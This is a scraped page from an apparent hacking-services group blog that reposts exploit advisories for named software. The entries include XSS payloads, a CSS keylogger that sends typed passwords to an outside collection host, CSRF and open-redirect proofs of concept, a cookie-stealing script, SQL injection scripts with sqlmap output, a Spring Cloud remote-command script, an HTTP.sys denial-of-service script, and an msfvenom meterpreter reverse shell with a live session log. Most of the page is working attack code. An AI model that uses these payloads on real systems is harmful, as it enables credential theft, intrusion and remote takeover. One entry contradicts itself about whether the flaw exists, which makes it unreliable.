Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863113753

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
# Date: 30/07/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/car-rental-php-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

Release Notes:

Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.

## Stored XSS
-----------------------------------------------
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1

payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
-----------------------------------------------

POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"
7. Accept with terms & Press [Booking]
XSS Fired on Local User Browser.
8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
XSS Will Fire and Executed on his Browser
9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
XSS Will Fire and Executed on his Browser
HireHackking 
Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs:  Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================

1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then you upload html file .(html file content is as below)

'''
<html>
    <head>
        <title>
            Login
        </title>
        <style>
            input[type="password"][value*="q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/q');}
            input[type="password"][value*="w"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/w');}
            input[type="password"][value*="e"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/e');}
            input[type="password"][value*="r"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/r');}
            input[type="password"][value*="t"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/t');}
            input[type="password"][value*="y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/y');}
            input[type="password"][value*="u"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/u');}
            input[type="password"][value*="i"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/i');}
            input[type="password"][value*="o"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/o');}
            input[type="password"][value*="p"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/p');}
            input[type="password"][value*="a"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/a');}
            input[type="password"][value*="s"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/s');}
            input[type="password"][value*="d"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/d');}
            input[type="password"][value*="f"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/f');}
            input[type="password"][value*="g"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/g');}
            input[type="password"][value*="h"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/h');}
            input[type="password"][value*="j"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/j');}
            input[type="password"][value*="k"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/k');}
            input[type="password"][value*="l"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/l');}
            input[type="password"][value*="z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/z');}
            input[type="password"][value*="x"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/x');}
            input[type="password"][value*="c"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/c');}
            input[type="password"][value*="v"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/v');}
            input[type="password"][value*="b"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/b');}
            input[type="password"][value*="n"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/n');}
            input[type="password"][value*="m"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/m');}
            input[type="password"][value*="Q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
            input[type="password"][value*="W"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/W');}
            input[type="password"][value*="E"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/E');}
            input[type="password"][value*="R"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/R');}
            input[type="password"][value*="T"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/T');}
            input[type="password"][value*="Y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
            input[type="password"][value*="U"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/U');}
            input[type="password"][value*="I"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/I');}
            input[type="password"][value*="O"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/O');}
            input[type="password"][value*="P"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/P');}
            input[type="password"][value*="A"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/A');}
            input[type="password"][value*="S"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/S');}
            input[type="password"][value*="D"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/D');}
            input[type="password"][value*="F"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/F');}
            input[type="password"][value*="G"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/G');}
            input[type="password"][value*="H"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/H');}
            input[type="password"][value*="J"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/J');}
            input[type="password"][value*="K"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/K');}
            input[type="password"][value*="L"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/L');}
            input[type="password"][value*="Z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
            input[type="password"][value*="X"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/X');}
            input[type="password"][value*="C"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/C');}
            input[type="password"][value*="V"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/V');}
            input[type="password"][value*="B"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/B');}
            input[type="password"][value*="N"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/N');}
            input[type="password"][value*="M"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/M');}
            input[type="password"][value*="1"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/1');}
            input[type="password"][value*="2"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/2');}
            input[type="password"][value*="3"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/3');}
            input[type="password"][value*="4"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/4');}
            input[type="password"][value*="5"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/5');}
            input[type="password"][value*="6"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/6');}
            input[type="password"][value*="7"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/7');}
            input[type="password"][value*="8"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/8');}
            input[type="password"][value*="9"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/9');}
            input[type="password"][value*="0"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/0');}
            input[type="password"][value*="-"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/-');}
            input[type="password"][value*="."]{
            background-image: url('https://enflownwx6she.x.pipedream.net/.');}
            input[type="password"][value*="_"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
            input[type="password"][value*="@"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
            input[type="password"][value*="?"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
            input[type="password"][value*=">"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
            input[type="password"][value*="<"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
            input[type="password"][value*="="]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
            input[type="password"][value*=":"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
            input[type="password"][value*=";"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
        </style>
    </head>
<body>
    <label>Please enter username and password</label>
    <br><br>
    Password:: <input type="password" />
    <script>
        document.querySelector('input').addEventListener('keyup', (evt)=>{
        evt.target.setAttribute('value', evt.target.value);
        })
   </script>
</body>
</html>
'''

4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)


POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close

url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
 
6.If write as (https://ATTACKER.com) in url parameter on abowe request on  you redirect to attacker.com.
7.We write to html files url

url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html

8.And create csrf-poc with csrf.poc.generator

<html>
  <title>
    This CSRF was found by miri
  </title>
  <body>
    <h1>
      CSRF POC
    </h1>
    <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>


9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.


Poc video : https://youtu.be/m-x_rYXTP9E
HireHackking 
#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 25 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://piwigo.org
#Version: 13.7.0
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user authorized to upload photos.
2–  Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.
3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.

#Payload
<sCriPt>alert(1);</sCriPt>
HireHackking 
## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure,
https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145



## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the
victim to click on his website and done.
This will be hard to detect.

## Conclusion:
Please be careful, for suspicious sites or be careful who sending you
an link to open!

## Staus: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```js
## This is a Get request from the server when the victims click! And
it is enough to understand this vulnerability! =)

<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>

## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty

```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)

## Time spend:
01:30:00
HireHackking

Lost and Found Information System v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection # Date: 2023-06-30 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Dork : /php-lfis/admin/?page=system_info/contact_information # Tested on: Windows/Linux # CVE : CVE-2023-33592 import requests # URL of the vulnerable component url = "http://example.com/php-lfis/admin/?page=system_info/contact_information" # Injecting a SQL query to exploit the vulnerability payload = "' OR 1=1 -- " # Send the request with the injected payload response = requests.get(url + payload) # Check if the SQL injection was successful if "admin" in response.text: print("SQL injection successful!") else: print("SQL injection failed.")
HireHackking

Faculty Evaluation System v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection # Date: 07/2023 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip # Version: 1.0 # Tested on: Windows Server 2022 SQLi #1 File: edit_evaluation Line #4 $qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array(); [...] SQLi #2 File: view_faculty.php Line #4 // Add "id" parameter after "view_faculty" parameter then add equals "id" with integer [...] $qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array(); [...] Steps to Exploit: 1. Login to application 2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1" 3. Copy request to intercept proxy to file 4. Exploit using SQLMap sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint [...] [INFO] testing MySQL [INFO] confirming MySQL [INFO] the back-end DBMS is MySQL [INFO] actively fingerprinting MySQL [INFO] executing MySQL comment injection fingerprint back-end DBMS: active fingerprint: MySQL >= 5.7 comment injection fingerprint: MySQL 5.6.49 fork fingerprint: MariaDB [...]
HireHackking

Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution

HACKER · %s · %s

## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution ## Author: nu11secur1ty ## Date: 01.14.2022 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264 ## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 ## CVE-2022-21907 ## Description: NOTE: After a couple of hours of tests and experiments, I found that there have been no vulnerabilities, this is just a ridiculous experiment of Microsoft. When I decided to install the IIS packages on these Windows platforms, everything was ok, and everything is patched! Windows Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by default, but after I decided to upgrade from 1909 to 2004. I found a serious problem! The Windows 10 version 2004 - 2020 year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack method: buffer overflow - deny of service and restart the system. This problem exists, from last year which is reported on CVE-2021-31166, and still there! On that days I have worked on it again with the help and collaboration of Axel Souchet 0vercl0k the author of the idea. On that day, I wrote an only one-line command to exploit this vulnerability! [+]Exploit: ```python #!/usr/bin/python # Author @nu11secur1ty # CVE-2022-21907 from colorama import init, Fore, Back, Style init(convert=True) import requests import time print(Fore.RED +"Please input your host...\n") print(Style.RESET_ALL) print(Fore.YELLOW) host = input() print(Style.RESET_ALL) print(Fore.BLUE +"Sending of especially malicious crafted packages, please wait...") print(Style.RESET_ALL) time.sleep(17) print(Fore.GREEN) # The PoC :) poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\ BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\ RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\ TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\ OOOAOAOOOAOOAOOOAOOOAOOOAOO,\ ****************************stupiD, *, ,',}) # Not necessary :) print(poc,"\n") print(Style.RESET_ALL) ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html) ## Time spend: 05:30:00
HireHackking

Spring Cloud 3.2.2 - Remote Command Execution (RCE)

HACKER · %s · %s

# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE) # Date: 07/07/2023 # Exploit Author: GatoGamer1155, 0bfxgh0st # Vendor Homepage: https://spring.io/projects/spring-cloud-function/ # Description: Exploit to execute commands exploiting CVE-2022-22963 # Software Link: https://spring.io/projects/spring-cloud-function # CVE: CVE-2022-22963 import requests, argparse, json parser = argparse.ArgumentParser() parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True) parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True) args = parser.parse_args() print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n") headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command } data = {"data": ""} request = requests.post(args.url, data=data, headers=headers) response = json.dumps(json.loads(request.text), indent=2) print(response)
HireHackking
# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.7 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36165 #PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto C:\Users>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation
HireHackking

BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: None # Version: 5 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36163 #PoC: An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like: '><script>prompt("XSS");</script><div id="aa After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser. #Payload: company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
HireHackking

XAMPP 8.2.4 - Unquoted Path

HACKER · %s · %s

# Exploit Title: XAMPP 8.2.4 - Unquoted Path # Date: 07/2023 # Exploit Author: Andrey Stoykov # Version: 8.2.4 # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe # Tested on: Windows Server 2022 # Blog: http://msecureltd.blogspot.com/ Steps to Exploit: 1. Search for unquoted paths 2. Generate meterpreter shell 3. Copy shell to XAMPP directory replacing "mysql.exe" 4. Exploit by double clicking on shell C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto // Generate shell msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe // Setup listener msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set lhost 192.168.1.13 msf6 exploit(multi/handler) > set lport 4443 msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp msf6 exploit(multi/handler) > run msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.13:4443 [*] Sending stage (175686 bytes) to 192.168.1.11 [*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700 meterpreter > getuid Server username: WIN-5PT4K404NLO\astoykov meterpreter > getpid Current pid: 4724 meterpreter > shell Process 5884 created. Channel 1 created. Microsoft Windows [Version 10.0.20348.1] (c) Microsoft Corporation. All rights reserved. [...] C:\xampp\mysql\bin>dir dir Volume in drive C has no label. Volume Serial Number is 80B5-B405 Directory of C:\xampp\mysql\bin [...]
HireHackking

News Portal v4.0 - SQL Injection (Unauthorized)

HACKER · %s · %s

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized) # Date: 09/07/2023 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643 # Version: 4.0 # We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example 1 ----------------------------------------------------------------------------------------------------------------------- Param: name, email, comment ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /newsportal/news-details.php?nid=13 HTTP/1.1 Origin: http://127.0.0.1 Sec-Fetch-User: ?1 Host: 127.0.0.1:80 Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin sec-ch-ua-mobile: ?0 Content-Length: 277 Sec-Fetch-Mode: navigate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Connection: close Referer: http://127.0.0.1/newsportal/news-details.php?nid=13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-ch-ua-platform: "Windows" Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Fetch-Dest: document csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 10:55:26 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 146161 <script>alert('comment successfully submit. Comment will be display after admin review ');</script> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content=""> <meta name="author" content=""> <title>News Portal | Home Page [...] ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /newsportal/news-details.php?nid=13 HTTP/1.1 Origin: http://127.0.0.1 Sec-Fetch-User: ?1 Host: 127.0.0.1:80 Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin sec-ch-ua-mobile: ?0 Content-Length: 276 Sec-Fetch-Mode: navigate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Connection: close Referer: http://127.0.0.1/newsportal/news-details.php?nid=13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-ch-ua-platform: "Windows" Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Fetch-Dest: document csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 10:56:06 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 525 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21 Stack trace: #0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...') #1 {main} thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w ----------------------------------------------------------------------------------------------------------------------- SQLMap example param 'comment': ----------------------------------------------------------------------------------------------------------------------- sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests: --- Parameter: #2* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit= Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit= --- web application technology: PHP 8.1.17, Apache 2.4.56 bacck-end DBMS: MySQL >= 5.0 (MariaDB fork) ## Example 2 - login to administration panel ----------------------------------------------------------------------------------------------------------------------- Param: username ----------------------------------------------------------------------------------------------------------------------- Req 